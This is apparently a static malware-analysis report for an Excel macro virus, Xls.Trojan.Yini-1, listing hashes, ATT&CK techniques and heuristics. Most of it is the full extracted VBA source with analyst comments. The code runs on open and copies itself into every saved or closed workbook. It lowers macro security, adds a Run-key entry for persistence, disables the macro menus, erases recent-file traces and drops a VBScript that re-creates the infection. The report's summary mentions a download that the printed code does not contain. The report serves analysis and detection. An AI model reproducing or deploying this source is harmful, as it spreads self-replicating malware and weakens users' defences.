Xls.Trojan.Yini-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 1403ff432466eeb0…

MALICIOUS

Office (OLE)

39.5 KB First seen: 2015-09-14
MD5: 000d91cadbc4290d8d6c00b42f624450 SHA-1: 8c2f5294c66040261400ba2d7c73b311024f377a SHA-256: 1403ff432466eeb043f36dac1f12902ecddc506a2379c24756b5e930094751f1
328 Risk Score

Malware Insights

Xls.Trojan.Yini-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample is an Excel file containing VBA macros that execute upon opening. The Workbook_Open subroutine attempts to create a VBScript file named 'yinyin3345.vbs' in the Excel startup path and potentially save a workbook as an add-in named 'yinyin3345.xls'. The script also contains logic for self-replication and AV tampering. This indicates an attempt to download and execute a second-stage payload and establish persistence.

Heuristics 8

  • ClamAV: Xls.Trojan.Yini-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Yini-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      Set WshShell = CreateObject("WScript.Shell")
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Target.DeleteLines 1, Source.CountOfLines
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Set Fso = CreateObject("scripting.filesystemobject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6592 bytes
SHA-256: a21d43761fc3bce9b061cdf8eaf77070a22f1cac3c7bfc8f23a0cd24a7f2464d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True





' Module-level declarations of the ThisWorkbook module. The WithEvents
' Application reference is what allows App_WorkbookBeforeSave and
' App_WorkbookBeforeClose (below) to fire; it is only assigned
' (Set App = Application) in Workbook_Open, and only when this workbook is
' the copy living in the Excel startup path.
Option Explicit
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1




' File names and drop locations used throughout the module (all literal):
'   Darling   - add-in copy saved into Application.StartupPath (Workbook_Open)
'   StartLove - VBScript written under <Templates>\Software\ by CreateFile
'   MYTEXT    - plain-text dump of this module's source, written by CreateFile
'               and read back by the VBScript through CodeModule.addfromfile
Private Const Darling As String = "yinyin3345.xls"
Private Const StartLove As String = "yinyin3345.vbs"
Private Const MYTEXT As String = "c:\windows\system\HappyBirthday"
' Auto-executes when the document is opened (OLE_VBA_WBOPEN). Every statement
' runs under On Error Resume Next, so any step that fails (missing folder,
' programmatic VBProject access denied, read-only path) is skipped silently.
' Two outcomes depending on where this copy lives:
'   - this workbook IS the startup-folder copy -> hook Application events
'   - no startup copy exists yet               -> create it as an add-in
' DarlingPath is declared but never used.
Private Sub Workbook_Open()
  Dim DarlingPath As String
  Dim StartPath As String
  Dim DarlingBook As Workbook
  Dim Fullpath As String
  Dim ExistFlag
  On Error Resume Next
  Call Hide        ' registry / menu tampering and trace removal (see Hide)
  Call CreateFile  ' drops the .vbs and the plain-text source copy (see CreateFile)
  StartPath = Application.StartupPath
  ' Upper-cased full path of the add-in copy: <StartupPath>\YINYIN3345.XLS
  Fullpath = UCase$(StartPath + "\" + Darling)
  ' Dir$ returns "" when the file is absent, so ExistFlag = 0 means "not dropped yet"
  ExistFlag = Len(Dir$(Fullpath))
  
  If UCase$(Me.FullName) = Fullpath Then
    ' Running from the startup folder: wire up the Application-level event
    ' handlers so every workbook saved or closed in this session is visited.
    Set App = Application
  ElseIf (ExistFlag = 0) Then
    ' Startup copy missing: build a new add-in workbook, inject the code, save it.
    Application.ScreenUpdating = False
    If Len(Dir(StartPath, vbDirectory)) = 0 Then
       MkDir StartPath
    End If
    Set DarlingBook = Application.Workbooks.Add
    DarlingBook.IsAddin = True
    HurtWbk DarlingBook   ' copies this module's source into the new workbook
    'DarlingBook.SaveAs Fullpath, xlNormal
    DarlingBook.SaveAs Fullpath, xlAddIn
    DarlingBook.Close
    Application.ScreenUpdating = True
  Else
    ' Startup copy already present and this is some other workbook: nothing to do.
  End If
End Sub
' Application-level save handler, active only after Workbook_Open has executed
' Set App = Application. Runs for every workbook about to be saved and tries
' to copy this module's code into it before the save reaches disk; failures
' (e.g. VBProject access blocked) are suppressed.
Private Sub App_WorkbookBeforeSave(ByVal Wbk As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
  On Error Resume Next
  HurtWbk Wbk
End Sub
' Application-level close handler (same activation as App_WorkbookBeforeSave).
' For any workbook that already exists on disk (Wbk.Path non-empty) it calls
' HurtWbk and, if that reports success, saves the workbook.
' NOTE(review): HurtWbk only ever assigns HurtWbk = False, so the inner If is
' never taken and the Save / Saved lines are dead as written; the HurtWbk call
' itself still runs, only the explicit save is skipped.
Private Sub App_WorkbookBeforeClose(ByVal Wbk As Excel.Workbook, Cancel As Boolean)
  On Error Resume Next
  If Len(Wbk.Path) <> 0 Then
    If HurtWbk(Wbk) Then
      Wbk.Save
      Wbk.Saved = True
      
    End If
  End If
End Sub
' Replication routine (OLE_VBA_MACRO_VIRUS_REPLICATION): replaces the contents
' of Wbk's ThisWorkbook module with the full source of this module through the
' VBE object model (VBProject / CodeModule). Requires programmatic access to
' the VBA project; with On Error Resume Next a denied access leaves Wbk
' untouched and the function still returns normally.
' Returns: always False — the result is assigned once and never set to True.
Private Function HurtWbk(Wbk As Workbook) As Boolean
  Dim Source As Object
  Dim Target As Object
  Dim FindResult As Boolean
  On Error Resume Next
  HurtWbk = False
  Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
  Set Target = Wbk.VBProject.VBComponents("ThisWorkbook").CodeModule
  ' Infection marker check: search the target module for the literal
  ' "yinyin3345.xls" (CodeModule.Find arguments: start line 1, start column 1,
  ' end line 10, end column 30, no whole-word / case match).
  FindResult = Wbk.VBProject.VBComponents("ThisWorkBook").CodeModule.Find("yinyin3345.xls", 1, 1, 10, 30, False, False) 'check whether the target file already carries the code
  If FindResult = False Then
    ' Marker absent: delete as many lines from the target as the SOURCE has
    ' (not the target's own count), then append the complete source text.
    ' If the target is shorter, the DeleteLines call presumably errors and is
    ' swallowed by On Error Resume Next.
    Target.DeleteLines 1, Source.CountOfLines
    Target.AddFromString Source.Lines(1, Source.CountOfLines)
    
  End If
  
End Function

' Trace removal and environment tampering. Despite the name it does not hide
' the workbook; in order it:
'   1. deletes the file behind any Excel recent-files entry whose name contains
'      "yinyin3345.xls", and the "yinyin~1.lnk" shortcut in the Recent folder
'   2. writes HKCU\...\Office\9.0\excel\Security\Level = 1, i.e. lowers the
'      Excel 2000 macro security setting (1 is presumably the "Low" level)
'   3. registers the dropped .vbs under the machine-wide HKLM ...\Run key as
'      "internet.exe" (T1547.001 persistence)
'   4. disables the Tools-menu entry whose caption starts with "宏" (Chinese
'      for "Macro") and disables/hides every control on the "macro" command
'      bar, removing the user's access to the macro dialogs.
' Every step is under On Error Resume Next, so none is required to succeed
' (e.g. the HKLM write fails silently without sufficient rights).
Sub Hide()
  Dim Con
  Dim WshShell
  Dim Fullpath As String
  Dim Fso
  Dim File
  Set Fso = CreateObject("scripting.filesystemobject")   ' OLE_VBA_CREATEOBJ
  Set WshShell = CreateObject("WScript.Shell")           ' OLE_VBA_WSCRIPT
  On Error Resume Next
  ' (1) recent-files list: File.Name is matched, File.Path is what gets deleted
  For Each File In Application.RecentFiles
     If InStr(File.Name, "yinyin3345.xls") > 0 Then
        Fso.deletefile File.Path
     End If
  Next File
  On Error Resume Next
  Fullpath = WshShell.SpecialFolders("recent") & "\yinyin~1.lnk"
  If Len(Dir$(Fullpath)) > 0 Then
    Fso.deletefile Fullpath
  End If
  ' Fullpath is reused: from here on it holds the location of the dropped .vbs
  Fullpath = WshShell.SpecialFolders("Templates") & "\Software\yinyin3345.vbs"
  ' (2) macro security downgrade (REG_DWORD 1)
  WshShell.regwrite "HKCU\Software\Microsoft\Office\9.0\excel\Security\Level", 1, "REG_DWORD"
  ' (3) Run-key persistence; the value name "internet.exe" has no relation to the .vbs content
  WshShell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\internet.exe", Fullpath
  On Error Resume Next
  ' (4) only the first matching Tools-menu control is disabled (Exit For)
  For Each Con In Application.CommandBars("tools").Controls
    If Left$(Con.Caption, 1) = "宏" Then
      Con.Enabled = False
      Exit For
    End If
  Next Con
  On Error Resume Next
  For Each Con In Application.CommandBars("macro").Controls
    Con.Enabled = False
    Con.Visible = False
  Next Con
End Sub

' Dropper: writes two files to disk using the same file handle (#1) in turn.
'   - <Templates>\Software\yinyin3345.vbs (StartLove): a stand-alone VBScript
'     which, when run (Hide registers it under the HKLM Run key), re-creates
'     the startup add-in if it is missing by loading the source from MYTEXT,
'     and on two date triggers shows a message box and deletes itself.
'   - c:\windows\system\HappyBirthday (MYTEXT): plain-text dump of this
'     module, i.e. what the .vbs feeds to CodeModule.addfromfile.
' In the Print #1 statements "&" and ";" both just concatenate the items
' (";" prints the next item with no separator), and Chr(34) inserts the
' double quotes the generated script needs. i and Text are declared but unused.
Sub CreateFile()
  Dim Fso, Source
  Dim Wsh
  Dim Myfolder
  Dim FileName, i, Text
  Set Fso = CreateObject("scripting.filesystemobject")
  Set Wsh = CreateObject("wscript.shell")
  Myfolder = Wsh.SpecialFolders("Templates") & "\Software\"
  Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
  If Not Fso.folderexists(Myfolder) Then
    Fso.createfolder Myfolder
  End If
  FileName = Myfolder & StartLove
  ' ---- generated VBScript (yinyin3345.vbs) ----
  Open FileName For Output As #1
  Print #1, "Dim Fso,Wsh,Cell,myBook,MyText"
  Print #1, "Set Fso = CreateObject(" & Chr(34) & "scripting.filesystemobject"; Chr(34); ")"
  Print #1, "Set wsh = CreateObject(" & Chr(34) & "wscript.shell"; Chr(34); ")"
  ' The script drives Excel through COM automation
  Print #1, "Set cell = CreateObject(" & Chr(34) & "excel.application" & Chr(34) & ")"
  ' Re-drop the startup add-in only when it is absent
  Print #1, "if Fso.fileexists(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & ") = false then"
  Print #1, "Set Mybook = cell.Workbooks.Add"
  Print #1, "Mybook.IsAddin = True"
  ' Source is read back from the MYTEXT dump written at the end of this Sub
  Print #1, "Mybook.VBProject.VBComponents(" & Chr(34) & "ThisWorkbook" & Chr(34) & ").CodeModule.addfromfile " & Chr(34) & "c:\windows\system\happybirthday" & Chr(34)
  ' 18 is the numeric value of xlAddIn, matching the SaveAs in Workbook_Open
  Print #1, "Mybook.SaveAs UCase(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & "), 18"
  Print #1, "Mybook.Close"
  Print #1, "Set cell = Nothing"
  Print #1, "end if"
  ' Date triggers: 4 November shows a birthday greeting; Thursday (Weekday = 5
  ' with the default Sunday-first week) shows a "contact your administrator if
  ' you cannot get online" notice. Both branches then delete the .vbs itself.
  Print #1, "If Month(Date) = 11 And Day(Date) = 4 Then"
  Print #1, "MsgBox " & Chr(34) & "祝MS.YINYIN3345小姐和MR.myfrien4061生日快乐!!!!!!!!" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34)
  Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") &  " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34)
  Print #1, "elseif weekday(date)= 5 then"
  Print #1, "MsgBox " & Chr(34) & "您的电脑如果出现不能上网的问题,请和系统管理员联系。" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34)
  Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") &  " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34)
  Print #1, "else"
  Print #1, "end if"
  Print #1, "set fso = nothing"
  Print #1, "set wsh = nothing"
  Close #1
  ' ---- plain-text copy of this module (MYTEXT) ----
  Open MYTEXT For Output As #1
  Print #1, Source.Lines(1, Source.CountOfLines)
  Close #1
  Set Source = Nothing
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True